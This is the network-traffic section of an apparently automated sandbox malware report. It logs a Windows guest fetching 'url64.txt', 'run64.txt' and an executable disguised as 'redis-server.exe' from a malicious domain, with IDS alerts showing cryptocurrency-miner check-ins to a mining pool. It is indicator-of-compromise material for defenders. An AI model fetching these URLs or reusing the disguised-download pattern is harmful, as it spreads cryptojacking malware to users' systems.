Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| down.fuck-jp.ru | 104.21.5.45 | |
| api.fuck-jp.ru | 172.67.132.245 | |
| pool.fuck-jp.ru | 185.144.31.44 |
- TCP Requests
-
-
192.168.56.101:49212 172.67.132.245:80api.fuck-jp.ru
-
192.168.56.101:49213 172.67.132.245:80api.fuck-jp.ru
-
192.168.56.101:49217 185.144.31.44:8888pool.fuck-jp.ru
-
192.168.56.101:49218 185.144.31.44:8888pool.fuck-jp.ru
-
192.168.56.101:49221 185.144.31.44:8888pool.fuck-jp.ru
-
192.168.56.101:49222 185.144.31.44:8888pool.fuck-jp.ru
-
192.168.56.101:49223 185.144.31.44:8888pool.fuck-jp.ru
-
45.147.228.207:1569 192.168.56.101:49243
-
45.147.228.207:1569 192.168.56.101:49266
-
45.147.228.207:1569 192.168.56.101:49269
-
45.147.228.207:1569 192.168.56.101:49273
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:59370 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://api.fuck-jp.ru/url64.txt
REQUEST
RESPONSE
BODY
GET /url64.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.fuck-jp.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:43:52 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 18:18:21 GMT
etag: W/"34-5caf3175d3c89"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QpyGrTwutSAUBrxGPnRgiq0XmBuZgKn4bOZpdAnKGbkJkxWW6c1dY4c%2BuL3OSEcPOsnVLjkqUYpbXURqRTaFYsr1m%2BSA1geTbm5JJh4eo4AFxueNjI1SCpWuqwMdYrpX1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 689dd43a09180a46-KIX
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
GET
200
http://api.fuck-jp.ru/run64.txt
REQUEST
RESPONSE
BODY
GET /run64.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.fuck-jp.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:43:52 GMT
Content-Type: text/plain
Content-Length: 32
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 18:41:15 GMT
etag: "20-5caf3694771ba"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMRgyiTMN5gfyGrRQ5LwFCMVQwUp6YK8lrl5Q5XKpWAtRD7NiTozn9t40ZOYUu8DuxvoHbvT061hHe4OvTBIvRVZokg0Sgn1XOlvFFY3r46x6cnSjUA32CUQwGZwyqH8Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 689dd43e8aa50a46-KIX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
GET
200
http://down.fuck-jp.ru/redis-server.exe
REQUEST
RESPONSE
BODY
GET /redis-server.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: down.fuck-jp.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:43:53 GMT
Content-Type: application/x-msdownload
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 18:13:47 GMT
etag: "717c00-5caf3070cf9f2-gzip"
content-encoding: gzip
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mxGIXHOQYHQWRNB8UEaHZP1lveCI34H0QWc7LdARW1tlqdgAHvpVoj2tT08mj%2FTA0hGYW2nWsRvtgdEUIazxp39biXjP%2F%2FsXZjtFUKaQ%2FkRnSpykJ8SFSKUlxsPBetK6S4A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 689dd4439f95fcd1-KIX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 172.67.132.245:80 -> 192.168.56.101:49213 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 192.168.56.101:49218 -> 185.144.31.44:8888 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
| TCP 192.168.56.101:49221 -> 185.144.31.44:8888 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
| TCP 192.168.56.101:49217 -> 185.144.31.44:8888 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
| TCP 192.168.56.101:49223 -> 185.144.31.44:8888 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
| TCP 192.168.56.101:49222 -> 185.144.31.44:8888 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts